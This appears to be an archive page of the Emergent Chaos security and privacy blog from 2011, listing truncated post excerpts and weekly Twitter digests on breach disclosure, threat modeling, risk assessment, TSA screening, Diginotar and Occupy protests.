There are semi-regular suggestions to allow people to copyright facts about themselves as a way to fix privacy problems. At Prawfsblog, Brooklyn Law School Associate Professor Derek Bambauer responds in “Copyright and your face.” Key quote: One proposal raised was to provide people with copyright in their faceprints or facial features. This idea has two […]

 

Twitter Weekly Updates for 2011-12-11

RT @daveaitel Tests Show Most Store Honey Isn't Honey http://t.co/2oI3O6RK << Will anyone go to jail for fraud? # RT @jdp23 Look at the list of the FTC complaints — huge issues. And basically no consequnces to FB. So why should they change? #privchat # RT @threatpost $56 Billion Later and Airport #Security Is Still […]

 

Threat Modeling and Risk Assessment

Yesterday, I got into a bit of a back and forth with Wendy Nather on threat modeling and the role of risk management, and I wanted to respond more fully. So first, what was said: (Wendy) As much as I love Elevation of Privilege, I don’t think any threat modeling is complete without considering probability […]

 

Outrage of the Day: Police Violence

When the LAPD finally began arresting those of us interlocked around the symbolic tent, we were all ordered by the LAPD to unlink from each other (in order to facilitate the arrests). Each seated, nonviolent protester beside me who refused to cooperate by unlinking his arms had the following done to him: an LAPD officer […]

 

Particularly NewSchool Job Posting

From Keith Weinbaum, Director of Information Security of Quicken Loans Inc. https://www.quickenloanscareers.com/web/ApplyNow.aspx?ReqID=53545 From the job posting: WARNING:  If you believe in implementing security only for the sake of security or only for the sake of checking a box, then this is not the job for you.  ALSO, if your primary method of justifying security solutions […]

 

Podtrac.com and Listener Privacy

It turns out that it’s very hard to subscribe to many podcasts without talking to Podtrac.com servers. (Technical details in the full post, below.) So I took a look at their privacy statement: Podtrac provides free services to podcasters whereby Podtrac gathers data specific to individual podcasts (e.g. audience survey data, content ratings, measurement data, […]

 
 

Twitter Weekly Updates for 2011-12-04

New School blog "'Its Time to Learn Like Experts' by @jayjacobs" http://t.co/lnXTqyp8 # RT @dmolnar Help me shop for furniture http://t.co/rXxLrB4O # RT @moxie__ WhisperSystems has been acquired! http://t.co/M5i1g6D0 < Congratulations! I hope it leads to great things for Twitter privacy # RT @tsastatus A few new features, and a bunch of status updates, at […]

 

Gävle Goat Gambit Goes Astray

It’s a bit of a Christmas tradition here at Emergent Chaos to keep you informed about the Gävle Goat. Ok, technically, our traditions seem hit and miss, but whaddaya want from a site with Chaos in the name? You want precision, read a project management blog. Project management blogs probably set calendar reminders to kick […]

 

Paper: "The Future of Work is Play"

My colleague Ross Smith has just presented an important new paper, “The Future of Work is Play” at the IEEE International Games Innovation Conference. There’s a couple of very useful lessons in this paper. One is the title, and the mega-trends driving games into the workplace. Another is Ross’s lessons of when games work: Over […]

 

Big Brother Watch report on breaches

Over at the Office of Inadequate Security, Dissent says everything you need to know about a new report from the UK’s Big Brother Watch: Extrapolating from what we have seen in this country, what the ICO learns about is clearly only the tip of the iceberg there. I view the numbers in the BBW report […]

 

We Robot: The Conference

This looks like it has the potential to be a very interesting event: The University of Miami School of Law seeks submissions for “We Robot” – an inaugural conference on legal and policy issues relating to robotics to be held in Coral Gables, Florida on April 21 & 22, 2012. We invite contributions by academics, […]

 

Telephones and privacy

Three stories, related by the telephone, and their impact on privacy: CNN reports that your cell phone is being tracked in malls: Starting on Black Friday and running through New Year’s Day, two U.S. malls — Promenade Temecula in southern California and Short Pump Town Center in Richmond, Va. — will track guests’ movements by […]

 

"It's Time to Learn Like Experts" by Jay Jacobs

I want to call attention to a new, important and short article by Jay Jacobs. This article is a call to action to break the reliance on unvalidated expert opinions by raising awareness of our decision environment and the development of context-specific feedback loops. Everyone in the New School is a fan of feedback loops […]

 

Twitter Weekly Updates for 2011-11-27

MT @attractr Bejtlich: SEC Guidance Emphasizes Materiality for disclosing sec incidents: "new audience: shareholders" http://t.co/mlMts2Wd # RT @doctorow Just got to Occupy New School http://t.co/VjfVhFcN << I think Cory means something other than I would mean by this statement 🙂 # NYTimes reports man bites dog, I mean "Screening Still a Pain at Airports, Fliers […]

 

Relentless navel gazing, part MCXII

Two changes here at Emergent Chaos this weekend: first, a new, variable width theme which is a little tighter, so there’s more on a screen. Second, I’ve moved the twitter summary to weekly, as comments were running about 50-50 on the post asking for opinion. I think that may be a better balance. And a […]

 

The One Where David Lacey's Article On Risk Makes Us All Stupider

In possibly the worst article on risk assessment I’ve seen in a while, David Lacey of Computerworld gives us the “Six Myth’s Of Risk Assessment.”  This article is so patently bad, so heinously wrong, that it stuck in my caw enough to write this blog post.  So let’s discuss why Mr. Lacey has no clue […]

 

What's Wrong and What To Do About It?

Let me start with an extended quote from “Why I Feel Bad for the Pepper-Spraying Policeman, Lt. John Pike“: They are described in one July 2011 paper by sociologist Patrick Gillham called, “Securitizing America.” During the 1960s, police used what was called “escalated force” to stop protesters. “Police sought to maintain law and order often […]

 

Twitter Updates from Adam, 2011-11-25

RT @marciahofmann Carrier IQ backpedals on bogus legal threat, apologizes to security researcher. http://t.co/yY5o6JJk < Nice work Marcia! # Powered by Twitter Tools

 

Twitter Updates from Adam, 2011-11-24

RT @risktical #riskhose pocast, Episode 14 http://t.co/5hF9YKlZ @adamshostack & 'feedback loops' – great content! @jayjacobs @alexhutton # New "blog" points to Risk Hose podcast #14 with me, @alexhutton, @risktical @jayjacobs http://t.co/8zaBLD8x # RT @CYBERLAWRADIO About to go live on CLBR with CMU Proff @lorrietweet on Why Johnny Can't Opt Out – on webmasterradio.fm # RT […]

 

Risk Hose Podcast #14 with Adam and Alex

I’m on episode 14 of the Risk Hose podcast, with co-blogger Alex. Chris, Jay and Alex are joined by Adam Shostack and we dig into the topic of feedback loops within Information Security. You should check it out! Episode 14: Feedback Loops

 

Twitter Updates from Adam, 2011-11-23

NYTimes reports man bites dog, I mean "Screening Still a Pain at Airports, Fliers Say" http://t.co/vlPAH1n0 # New School blog post, "AT&T Hack Attempt" I'm looking for polling software http://t.co/d4YooBv9 # I missed a great opportunity in a recent podcast to say "controls implemented in a way that makes both auditors & attackers happy" # […]

 

AT&T Hack Attempt

First, good on AT&T for telling people that there’s been an attempt to hack their account. (My copy of the letter that was sent is after the break.) I’m curious what we can learn by discussing the attack. An AT&T spokesperson told Fox News that “Fewer than 1 percent of customers were targeted.” I’m currently […]

 

Twitter Updates from Adam, 2011-11-22

RT @doctorow Just got to Occupy New School http://t.co/VjfVhFcN << I think Cory means something other than I would mean by this statement 🙂 # Powered by Twitter Tools

 

Twitter Updates from Adam, 2011-11-21

MT @attractr Bejtlich: SEC Guidance Emphasizes Materiality for disclosing sec incidents: "new audience: shareholders" http://t.co/mlMts2Wd # Powered by Twitter Tools

 

Twitter Updates from Adam, 2011-11-20

New School blog post "Privacy is Security, Part LXII: The Steakhouse" http://t.co/cEjWix7N # MT @_nomap More on [obvious] Saudi airport fingerprint fail. It was mostly immigrant workers stranded for 12 hours. http://t.co/g3ih69Sk # MT @dgwbirch Heard on BBC that poor people use cash, end up paying up to £185 per annum more for utilities << […]

 

Privacy is Security, Part LXII: The Steakhouse

But in the last year and a half, at least 50 diners at restaurants like the Capital Grille, Smith & Wollensky, JoJo and Wolfgang’s Steakhouse ended up paying for more than just a fine piece of meat. Their card information — and, in effect, their identities [sic] — had been stolen by waiters in a […]

 

Twitter Updates from Adam, 2011-11-19

RT @alexhutton @adamshostack @bobblakley @threatpost I thought blogging was dead? << apparently! # RT @dostlund: NYPD has sidewalk checkpoints requiring ID to pass down Broadway. Iranian-born co-worker said "they used to do that in Tehran" # New Blog: Emergent Chaos endorses @wimremes for ISC(2) Board http://t.co/oAWTljcC # This post by Steve Bellovin reminded me of […]

 
 

Emergent Chaos endorses Wim Remes for ISC(2) Board

Today, we are sticking our noses in a place about which we know fairly little: the ISC(2) elections. We’re endorsing a guy we don’t know, Wim Remes, to shake stuff up. Because, really, we ought to care about the biggest and oldest certification in security, but hey, we don’t. And really, that’s a bit of […]

 

Twitter Updates from Adam, 2011-11-18

MT @ashk4n Most [Android?] Phones Ship w/ CarrierIQ "Rootkit" that allows carrier to keylog & record browser history http://t.co/90vYRCHR # MT @bobblakley @threatpost Orgs that ban social networks on company PCs ++more likely to be hacked http://t.co/z7oy4rYF http://t.co/9iIb4BBg # New School blog, "Block Social Media, Get Pwned" http://t.co/dWzuCyzz quick comments on @TELUSBusiness report. (Thanks @bobblakley!) […]

 

Block Social Media, Get Pwned

At least, that’s the conclusion of a study from Telus and Rotman. (You might need this link instead) A report in IT security issued jointly by Telus and the Rotman School of Management surveyed 649 firms and found companies that ban employees from using social media suffer 30 percent more computer security breaches than ones […]

 

Twitter Updates from Adam, 2011-11-17

RT @timoreilly TSA Puts Off Safety Study of X-ray Body Scanners http://t.co/GO4uHLN0 Meanwhile, Europe has banned them http://t.co/rmK3ZSTc # Powered by Twitter Tools

 

And there may be many others but they haven't been discovered

Three newly discovered elements were given names on Friday by the General Assembly of the International Union of Pure and Applied Physics at a meeting in London. They are Darmstadtium, or Ds, which has 110 protons in its nucleus and was named after the town in which it was discovered; Roentgenium, or Rg, with 111 […]

 

Twitter Updates from Adam, 2011-11-16

New School blog post "Breach disclosure and Moxie’s Convergence" http://t.co/mu5iLU2n (cc @moxie__ ) # New School blog post "Breach disclosure and Moxie’s Convergence" http://t.co/mu5iLU2n # Powered by Twitter Tools

 

Breach disclosure and Moxie's Convergence

Two weeks ago I finally got a chance to see Moxie’s Convergence/Trust Agility talk in person. (Since this was at work, let me just re-iterate that this blog is my personal opinions about what I saw.) It’s very good stuff, and Moxie and I had a good side chat about enhancing the usability of Convergence […]

 

Twitter Updates from Adam, 2011-11-15

RT @exiledsurfer @KforKallisti: Dan Siegel, Mayor Jean Quan's legal adviser quits over #OccupyOakland police raid http://t.co/c5brsq5u #ows # MT @mikko Somebody forgot a vacuum cleaner in a Swedish nuke plant, causing $267M in damages: http://t.co/kLRbV90h << someone tell stuxnet! # RT @dgwbirch was it a Freeman Dyson? (retires to cheers for making first ever physicist/vacuum […]

 

Twitter Updates from Adam, 2011-11-14

RT @WC2A_2AE Indian Communist Party General Sectry 'Let's fingerprint all Americans entering the country, like Brazil' http://t.co/GRBoQfYC # Powered by Twitter Tools

 

Twitter Updates from Adam, 2011-11-12

Nice of Apple to fix CVE-2011-0997, published in April (http://t.co/kOh6kTvs) # RT @jeremiahg "Steam Web sites hacked, gamer data exposed" http://t.co/daqkExWj < anyone see an attack vector? << Probably social eng 🙂 # RT @josephmenn @daveweigel The winner. RT @KagroX: Why didn't we just make 10/10/10 louder? # RT @WC2A_2AE Anyone interested in border security […]

 

Twitter Tools? Feedback please

So about a month ago, I started flowing my tweets over here. I’d love your thoughts on if it’s helpful, hurtful, or you just ignore it in your reader. [Update: currently arguments run 3:2 against continuing Twitter in the main feed. More (and civil) debate is invited.]

 

Twitter Updates from Adam, 2011-11-11

MT @normative How Far Will the Government Go in Collecting and Storing Data about us? New FBI Documents Shed Light http://t.co/zylCo3ES # RT @tqbf If the infosec community was a real influencer in crypto, we'd all be using Twofish instead of AES because of http://t.co/e21kDcwM # .@tqbf has the crypto or vuln community given us […]

 

Twitter Updates from Adam, 2011-11-10

MT @samablog More States Accept [fail to arrest?] TSA VIPR Teams at Transportation Hubs http://t.co/h3wdaQ3N via @zite # Are others seeing ICMP timeouts for http://t.co/y2uU0Qvt? /cc @moxie__ # RT @arj: @chenxiwang busts out her dog-eared copy of the Orange Book … < I've never seen a dog-eared copy of the Orange Book! # RT @dakami […]

 

Twitter Updates from Adam, 2011-11-09

RT @Fiona: Go watch The Muppets hang out on Google+. Me: Thank you: http://t.co/HacZWzBA << Is "Cookie Monster" an approved name? # RT @Jim_Harper When I describe @Cato's argument–"reasonable expectation of #privacy quot; FAIL–lawyers steeped in doctrine get confused. #Jones # New blog: "Slow thoughts on Occupy Seattle" http://t.co/13RTo5NE # RT @csoghoian Jones oral argument […]

 

Slow Thoughts on Occupy Seattle

I headed down to Occupy Seattle before a recent vacation, and have been mulling a bit on what I saw, because the lack of a coherent message or leadership or press make it easy to project our own opinions or simply mis-understand what the “Occupy” protests mean, and I wanted to avoid making that mistake. […]

 

Twitter Updates from Adam, 2011-11-08

New blog: "Thoughts on the 2011 DBIR and APT (Authorization Preservation Threats)" http://t.co/yXdAPMqv # New School blog: "Thoughts on the 2011 DBIR and APT (Authorization Preservation Threats)" http://t.co/yXdAPMqv # Powered by Twitter Tools

 

Thoughts on the 2011 DBIR and APT (Authorization Preservation Threats)

So Verizon has recently released their 2011 DBIR. Or perhaps more accurately, I’ve managed to pop enough documents off my stack that my scribbled-on notes are at the top, and I wanted to share some with you. A lot have gone to the authors, in the spirit of questions only they can answer. Here, I […]

 

Twitter Updates from Adam, 2011-11-07

RT @moxie__ Sarah's reflections on solitary confinement: http://t.co/z46aZjgM # RT @marcan42 RSA keys generated by Ruby didn't actually encrypt anything (e=1). "Oops". http://t.co/9vYNFVlI << I Ruby-encrypted this tweet # RT @ioerror We demand a vapid, condescending, meaningless, politically safe response to this petition: http://t.co/ndtf8tI4 # RT @bratling @mrkoot @adamshostack @ioerror Broken URL, not site. Here's […]

 

Twitter Updates from Adam, 2011-11-06

RT @k8em0 Thanks to speakers, attendees, organizers & volunteers for a fantastic & memorable #bluehat ! # RT @bengoldacre I'm leaving journalism for 6 months. Here's what I've learnt from writing about nonsense for 8 years http://t.co/GZlDnQ18 # RT @AdasBooks Book signing with @johncsh tomorrow at 1pm! http://t.co/pHqhbTv3 # RT @normative Profoundly depressed this is […]

 

Twitter Updates from Adam, 2011-11-05

RT @StephieShaver They say there's no rest for the wicked but at least there's espresso! FridayWHAT? << friday at BlueHat! # RT @Beaker: Congrats to @mortman on joining @enstratus! First @jamesurquhart then @botchagalupe and now Dave! All good friends together # As I watch @moxie__ give his trust talk at BlueHat, I realize how valuable […]

 

Twitter Updates from Adam, 2011-11-04

RT @at1as: Instead of useless Presidential Debates, how about a #wargame where we get to see how candidates respond to crisis situations? # RT @wikidsystems @adamshostack @at1as Kobayashi Maru! << Cyberyashi Maru! # Getting ready to give my #BlueHat talk on "How Computers Are Compromised." # Oooh, @jeremiahg wants us to play a game at […]

 

Twitter Updates from Adam, 2011-11-03

MT @samablog TSA Ignored Cancer Risks from TSA Scanners http://t.co/r72RAw2d via @zite # RT @k8em0 This year's #bluehat should be exciting, check out the lineup – http://t.co/Ee1LoHVK # RT @k8em0 #bluehat is on! Andrew Cushman reflects on past and future threats. http://t.co/w0GpjTQC # What do the comments from ISS World(http://t.co/51Z5ULNQ) mean for surveillance law in […]

 

Twitter Updates from Adam, 2011-11-02

RT @ioerror IEEE Global Humanitarian Technology Conference in Seattle http://t.co/VefGa4yy < Looks very exciting, wish I'd known sooner # Follow @ioerror for reporting of Patrick Ball, @alexvans for London Cyber-security event # New blog because my main email is down: "Email chaos: How to reach Adam Shostack" http://t.co/to9lKHKK # RT @GamingPrivacy reflecting on game design […]

 

Email chaos: How to reach Adam Shostack

The servers that host my personal email have been taken offline by a surprise attack by the evil forces of snow and ice, and my email is likely to start bouncing soon. If you need to reach me, you can use nameofthisblog @ google, or first.last @ microsoft. You can also ask me to follow […]

 

Twitter Updates from Adam, 2011-11-01

Short blog: "McWrap Chevre" http://t.co/K1LkXnFU # RT @lorrietweet Why Johnny Can’t Opt Out: A Usability Evaluation of Tools to Limit Online Behavioral Advertising http://t.co/5DDWfhVd # My personal email server is down because of the snow on the east coast. # RT @STRATFOR If #Anonymous does #OpCartel it will almost certainly lead to deaths for members: […]

 

EFF on HTTPS

The Electronic Frontier Foundation has published a report on the State of HTTPS Security that promises to be the first in a series and is well worth reading on its own. The TL;DR version:  HTTPS adoption is growing rapidly, but the current system, especially the Certificate Authorities, has much room for improvement before it actually […]

 

McWrap Chevre

Normally, I like the overlap of cultures, the boundaries of exploration and what comes from that exploration. But this three-way Frankenstien’s combination of French cheese, wraps (not sure where to attribute those–I think the US version is mostly from burritos, but there’s also Arabic pita wraps) and American is somehow best posted on Halloween:

 

Twitter Updates from Adam, 2011-10-31

RT @alexhutton Seriously? DHS doesn't *do* threat modeling? My rage is like a 1000 TSA exposed to cancer causing back scatter devices. # RT @ACLU FBI issued 143,074 National Security Letters '03-05 & reported 0 terrorism prosecutions as a result. Zilch. http://t.co/JM8FBFyf # RT @EthanZ Background on @alaa's detention for refusal to accept legitimacy of […]

 

Twitter Updates from Adam, 2011-10-30

"Plankytronixx" has a nice blog post on Elevation of Privilege at http://t.co/CFFrWAfF # RT @mattblaze Attention NYPD sign makers: "Just following orders" is not a great slogan. http://t.co/LHBOvQ8f # I'd missed @BillBrenner70 on Security Horror Show http://t.co/5nS0KHOH What can we do to stop the madness? # RT @AudryT Police confirmed: Pepper spray & rubber bullets […]

 
 

Twitter Updates from Adam, 2011-10-28

RT @dgwbirch I'm sure talks will be fun, but am looking forward to playing the new version of "Privacy" the card game http://t.co/PZGcFf9l # I accidentally clicked allow Firefox to share my location. Where the hell is the undo and why isn't it in privacy preferences? # ("Location" doesn't bring up anything in help) # […]

 

Twitter Updates from Adam, 2011-10-27

RT @PogoWasRight Congressman: Secret Report On #TSA Pat Downs, Body Scanner Failures Will “Knock Your Socks Off” http://t.co/pjFmd0Zz # RT @peterhoneyman i fly DTW where they are testing chat down. i opt out and clam up. they get all dour and nasty. # RT @e3i5: Every picture ULed to Facebook is examined for possible matches […]

 

Twitter Updates from Adam, 2011-10-26

RT @georgevhulme RT @msksecurity: The Dark Side Of Biometrics: 9 Million Israelis' Hacked Info Hits The Web http://t.co/817TMklU # Actually, @danphilpott, the best line is "Crews determined the land mines were benign and removed them from the bag." http://t.co/KobPO94k # RT @k8em0 This year's #bluehat should be exciting, check out the lineup – http://t.co/Ee1LoHVK # […]

 

DLNA Servers for the Mac

Very short version: Finding a DLNA player that supported the Mac and my new Oppo player was time consuming. Twonky is ok, but I would like something prettier, more reliable, and reasonably secure. I wanted to blog my experience in case it helps other folks. Also, as I posted this, I came across Ed Bott’s […]

 

Twitter Updates from Adam, 2011-10-25

New School blog: "Maria Klawe on increasing Women in Technology" http://t.co/NDugVafW # RT @Jim_Harper How Much Homeland Security is Enough? Live now at: http://t.co/XtUXmzp1 << Right question is "how much is too much?" 🙂 # RT @TheOnion American Voices: Should bikers have to register their trips with the government? Tell us #whatdoyouthink http://t.co/1NbLi5Rb # RT […]

 

Maria Klawe on increasing Women in Technology

I talk a lot about the importance of data in enabling us to bring the scientific method to bear on information security. There’s a reason for that: more data will let us know the falsehoods, and knowing the falsehoods will set us free. But discovering what claims don’t stand up to scrutiny is a matter […]

 

Some Thoughts on Binary Risk Assessment

Ben Sapiro showed off his Binary Risk Assessment (BRA) at SecTor recently.   While I didn’t see the presentation, I’ve taken some time and reviewed the slides and read through the documentation.  I thought I’d quickly give my thoughts on this: It’s awesome and it sucks. IT’S AWESOME That’s not damning with faint praise, rather, it’s […]

 
 

Sleepless in Seattle?

Reportedly, Seattle police have begun issuing tickets to drivers who honk their horns after 10 PM in support of the Occupy protest there. To the extent that the police are only doing this to those expressing a specific point of view, there seems to be a legitimate issue. I am certain that the police would […]

 

CIA Reveals Identity of Bin Laden Hunter

In the Atlantic Wire, Uri Friedman writes “Did the CIA Do Enough to Protect Bin Laden’s Hunter?” The angle Friedman chose quickly turns to outrage that John Young of Cryptome, paying close attention, was able to figure out from public statements made by the CIA, what the fellow looks like. After you’re done being outraged, […]

 

Twitter Updates from Adam, 2011-10-09

RT @stuxnet420 #twitter oh, yeah, it's on now. I'll see your Stuxnet and raise u a predator with an irc server. 🙂 http://t.co/hKpfDMBt # RT @drunkenpredator Phew. Think I kicked that software virus. Was really messing with my DEAR SIR I HAVE FOR YOU LUCRATIVE PROPOSAL # RT @runasand The CCC has reverse engineered, analyzed […]

 

Some random cloudy thinking

Thanks to the announcement of Apple’s iCloud, I’ve been forced to answer several inquiries about The Cloud this week.  Now, I’m coming out of hiding to subject all of you to some of it… The thing that you must never forget about The Cloud is that once information moves to The Cloud, you’ve inherently ceded […]

 

Twitter Updates from Adam, 2011-10-08

RT @ethicalhack3r @floatingatoll: The UNIX time zone database has been destroyed by its authors due to a legal threat. http://t.co/1zQIKZm8 # RT @radleybalko Unreal. CA appeals court upholds warrantless cell phone searches during traffic stops. http://t.co/KnklNSat # If you haven't seen it, @ErrataRob "Independent reporting of #OccupyWallStreet quot; http://t.co/qDYxPdFx is a long thoughtful engagement # […]

 

Twitter updates

I’ve decided to experiment with pushing my Twitter feed onto the blog. What do you think? For non-Twitter users, the RT means “re-tweet,” amplifying things that others have said and MT means modified tweet, where the RT plus comment don’t quite fit. If someone has php code to resolve t.co URLs into real URLs, that […]

 

Twitter Updates from Adam, 2011-10-07

Sad to say I can find nothing to say beyond thanks, Steve. # Hey @beaker, if you support http://t.co/ObdJFd79 they have Squirrel t-shirts! # I think that @asteingruebl raises some really good questions in http://t.co/nnbdDNBe # Eric Rachner continues to need to sue for accountability from Seattle police & their videos http://t.co/S3fHkcSM # RT @jilliancyork […]

 

Nothing to add

(I saw this here, would appreciate the right attribution.)

 

New School of Information Security Book Reading at Ada's

Last Sunday, I did a book reading at Ada’s Technical Books. As I say in the video, I was excited because while I’ve talked about the New School, and I’ve given talks about the New School, I hadn’t done a book reading, in part because of the nature of the book, and my personal comfort […]

 
 

The Diginotar Tautology Club

I often say that breaches don’t drive companies out of business. Some people are asking me to eat crow because Vasco is closing its subsidiary Diginotar after the subsidiary was severely breached, failed to notify their reliant parties, mislead people when they did, and then allowed perhaps hundreds of thousands of people to fall victim […]

 

Book Reading in Seattle on Sunday

This Sunday I’ll be reading from the New School at 4PM on Sunday at Ada’s Technical Books in Capitol Hill. If you’re in the area, you should come!

 

Lean Startups & the New School

On Friday, I watched Eric Ries talk about his new Lean Startup book, and wanted to talk about how it might relate to security. Ries concieves as startups as businesses operating under conditions of high uncertainty, which includes things you might not think of as startups. In fact, he thinks that startups are everywhere, even […]

 

Emergent Effects of Restrictions on Teenage Drivers

For more than a decade, California and other states have kept their newest teen drivers on a tight leash, restricting the hours when they can get behind the wheel and whom they can bring along as passengers. Public officials were confident that their get-tough policies were saving lives. Now, though, a nationwide analysis of crash […]

 

Diginotar Quantitative Analysis ("Black Tulip")

Following the Diginotar breach, FOX-IT has released analysis and a nifty video showing OCSP requests. As a result, lots of people are quoting a number of “300,000”. Cem Paya has a good analysis of what the OCSP numbers mean, what biases might be introduced at “DigiNotar: surveying the damage with OCSP.” To their credit, FoxIt […]

 

The Rules of Breach Disclosure

There’s an interesting article over at CIO Insight: The disclosure of an email-only data theft may have changed the rules of the game forever. A number of substantial companies may have inadvertently taken legislating out of the hands of the federal and state governments. New industry pressure will be applied going forward for the loss […]

 

California gets a strengthened Breach Notification Law

Governor Brown of California has signed a strengthened breach notification bill, which amends Sections 1798.29 and 1798.82 of the California Civil Code in important ways. Previous versions had been repeatedly vetoed by Arnold Schwarzenegger. As described[.DOC] by its sponsor’s office, this law: Establishes standard, core content — such as the type of information breached, time […]

 

Best autoresponse message

As Brad Feld says, this is the best auto-responder in a long time: I am currently out of the office on vacation. I know I’m supposed to say that I’ll have limited access to email and won’t be able to respond until I return — but that’s not true. My blackberry will be with me […]

 

15 Years of Software Security: Looking Back and Looking Forward

Fifteen years ago, I posted a copy of “Source Code Review Guidelines” to the web. I’d created them for a large bank, because at the time, there was no single document on writing or reviewing for security that was broadly available. (This was a about four years before Michael Howard and Dave LeBlanc published Writing […]

 

Change.

I’ve left Verizon.  A lot of folks have come up to me and asked, so I thought I’d indulge in a rather self-important blog-post and explain something: It wasn’t about Verizon, but about the opportunity I’ve taken. Wade, Chris, Hylender, Marc, Joe, Dave, Dr. Tippett & all the rest – they were all really, really […]

 

Nymwars: Thoughts on Google+

There’s something important happening around Google+. It’s the start of a rebellion against the idea of “government authorized names.” (A lot of folks foolishly allow the other side to name this as “real names,” but a real name is a name someone calls you.) Let’s start with “Why Facebook and Google’s Concept of ‘Real Names’ […]

 

Securosis goes New School

The fine folks at Securosis are starting a blog series on “Fact-based Network Security: Metrics and the Pursuit of Prioritization“, starting in a couple of weeks.  Sounds pretty New School to me!  I suggest that you all check it out and participate in the dialog.  Should be interesting and thought provoking. [Edit — fixed my […]

 

Tap Tap Snarky

From the app store: I hope this doesn’t cause Apple to ban snarky update messages.

 

Worst.Technology.Application.Ever. (?)

It’s occurring to me this morning that in terms of benefit/cost, purely in “damage to society” terms, the decision to put html in emails could be one of the worst ideas in the past 25 years. But that’s just me.  Your thoughts on others in the comments?

 

Emergent Map: Streets of the US

This is really cool. All Streets is a map of the United States made of nothing but roads. A surprisingly accurate map of the country emerges from the chaos of our roads: All Streets consists of 240 million individual road segments. No other features — no outlines, cities, or types of terrain — are marked, […]

 

Is iTunes 10.3.1 a security update?

Dear Apple, In the software update, you tell us that we should see http://support.apple.com/kb/HT1222 for the security content of this update: However, on visiting http://support.apple.com/kb/HT1222, and searching for “10.3”, the phrase doesn’t appear. Does that imply that there’s no security content? Does it mean there is security content but you’re not telling us about it? […]

 

Thoughts on this Independence Day

Emergent Chaos has a long tradition of posting the American Declaration of Independence here to celebrate the holiday. It’s a good document in many ways. It’s still moving, more than two centuries after it was written. It’s clearly written, and many people can learn from its structured approach to presenting a case. And last but […]

 

MySpace sells for $35 Million, Facebook to follow

So MySpace sold for $35 million, which is nice for a startup, and pretty poor for a company on which Rupert Murdoch spent a billion dollars. I think this is the way of centralized social network software. The best of them learn from their predecessors, but inevitably end up overcrowded. Social spaces change. You don’t […]

 

Breach Harm: Should Arizona be required to notify?

Over at the Office of Inadequate Security, Pogo was writing about the Lulzsec hacking of Arizona State Police. Her article is “A breach that crosses the line?” I’ve been blogging for years about the dangers of breaches. I am concerned about dissidents who might be jailed or killed for their political views, abortion doctors whose […]

 

Goodbye, Rinderpest, we're probably better off without you

On Tuesday in a ceremony in Rome, the United Nations is officially declaring that for only the second time in history, a disease has been wiped off the face of the earth. The disease is rinderpest. Everyone has heard of smallpox. Very few have heard of the runner-up. That’s because rinderpest is an epizootic, an […]

 

Sex, Lies & Cybercrime Surveys: Getting to Action

My colleagues Dinei Florencio and Cormac Herley have a new paper out, “Sex, Lies and Cyber-crime Surveys.” Our assessment of the quality of cyber-crime surveys is harsh: they are so compromised and biased that no faith whatever can be placed in their findings. We are not alone in this judgement. Most research teams who have […]

 

Communicating with Executives for more than Lulz

On Friday, I ranted a bit about “Are Lulz our best practice?” The biggest pushback I heard was that management doesn’t listen, or doesn’t make decisions in the best interests of the company. I think there’s a lot going on there, and want to unpack it. First, a quick model of getting executives to do […]

 

Are Lulz our best practice?

Over at Risky.biz, Patrick Grey has an entertaining and thought-provoking article, “Why we secretly love LulzSec:” LulzSec is running around pummelling some of the world’s most powerful organisations into the ground… for laughs! For lulz! For shits and giggles! Surely that tells you what you need to know about computer security: there isn’t any. And […]

 

How the Epsilon Breach Hurts Consumers

Yesterday, Epsilon and Sony testified before Congress about their recent security troubles. There was a predictable hue and cry that the Epsilon breach didn’t really hurt anyone, and there was no reason for them to have to disclose it. Much of that came from otherwise respectable security experts. Before I go on, let me give […]

 

ThreatPost goes New School

In “It’s Time to Start Sharing Attack Details,” Dennis Fisher says: With not even half of the year gone, 2011 is becoming perhaps the ugliest year on record for major attacks, breaches and incidents. Lockheed Martin, one of the larger suppliers of technology and weapons systems to the federal government, has become the latest high-profile […]

 

Map of Where Tourists Take Pictures

Eric Fischer is doing work on comparing locals and tourists and where they photograph based on big Flickr data. It’s fascinating to try to identify cities from the thumbnails in his “Locals and Tourists” set. (I admit, I got very few right, either from “one at a time” or by looking for cities I know.) […]

 

The Future of Education is Chaotic, Fun and Unevenly Distributed

After I wrote “The future of education is chaotic and fun“, I came across “The Montessori Mafia” about the unusual levels of successfulness that Montessori produces. In my post, I opened discussing how our current system of funding education in the US is to force everything through a government department. That department is constrained by […]

 

The Flying Spaghetti Monster

In honor of rapture day, the Flying Spaghetti Monster has chosen to manifest his tentacly goodness in Stanley Park in Vancouver:

 

Elevation of Privilege news

I wanted to let people know that Microsoft is making the source files for the Elevation of Privilege game available. They are Adobe Illustrator and InDesign files, and are now on the EoP download site. They’re the 85mb of zipped goodness. They can be used under the same Creative Commons Attribution 3.0 US license under […]

 

"Pirate my books, please"

Science fiction author Walter John Williams wants to get his out of print work online so you can read it: To this end, I embarked upon a Cunning Plan. I discovered that my work had been pirated, and was available for free on BitTorrent sites located in the many outlaw server dens of former Marxist […]

 

A Few Data Points

First, for those who might have missed it, Google has released Google Refine, a free tool for cleaning dirty data sets.  It allows you to pull in disparate data, then organize and clean it for consistency. Next, some interesting thoughts on how “anonymized” data sets aren’t, and some thoughts on the implications of this from […]

 

Photoblogging CHI2011

Last week, I had the pleasure of attending the ACM conference on Computer Human Interaction, CHI. As I mentioned in a work blog post, “Adding Usable Security to the SDL,” I’m now focused on usable security issues at work. I’m planning to say more about the conference in a little bit, but for right now, […]

 

Heaven Forbid the New York Times include Atheists

In “Is Your Religion Your Financial Destiny?,” the New York Times presents the following chart of income versus religion: Note that it doesn’t include the non-religious, which one might think an interesting group as a control. Now, you might think that’s because the non-religious aren’t in the data set. But you’d be wrong. In the […]

 

Representative Bono-Mack on the Sony Hack

There’s a very interesting discussion on C-SPAN about the consumer’s right to know about breaches and how the individual is best positioned to decide how to react. “Representative Bono Mack Gives Details on Proposed Data Theft Bill.” I’m glad to see how the debate is maturing, and how no one bothered with some of the […]

 

The future of education is chaotic and fun

Lately, I’ve seen three interesting bits on the future of education, and I wanted to share some thoughts on what they mean. The first is a quickie by Don Boudreaux at Cafe Hayek, titled “Grocery School.” It starts “Suppose that we were supplied with groceries in same way that we are supplied with K-12 education.” […]

 

New York memorials

There’s an excellent column in the old liberal tradition of celebrating liberty in this week’s New Yorker. It’s Memorials by Adam Goptnick, and includes a quote from John Stuart Mill at his rhetorical peak.

 
 

Quick Quotes For Your Morning

